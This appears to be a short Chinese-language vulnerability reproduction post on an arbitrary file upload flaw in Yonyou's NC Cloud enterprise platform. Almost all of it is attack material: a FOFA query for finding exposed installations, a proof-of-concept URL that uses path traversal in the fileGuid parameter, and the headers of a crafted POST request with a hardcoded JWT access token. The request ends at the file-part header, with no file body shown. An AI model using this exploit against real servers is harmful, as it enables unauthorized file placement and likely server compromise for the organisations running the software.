简介
NC Cloud是指用友公司推出的大型企业数字化平台。支持公有云、混合云、专属云的灵活部署模式。该产品uploadChunk文件存在任意文件上传漏洞。
漏洞复现
FOFA语法:
app="用友-NC-Cloud"
访问页面如下所示:
POC:/ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1
POST请求数据包:
accessTokenNcc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ
Content-Length: 149
Content-Type: multipart/form-data; boundary=bd966ad8118cfcc67ee341272f2900c4--bd966ad8118cfcc67ee341272f2900c4
Content-Disposition: form-data; name="file"; filename="text.txt"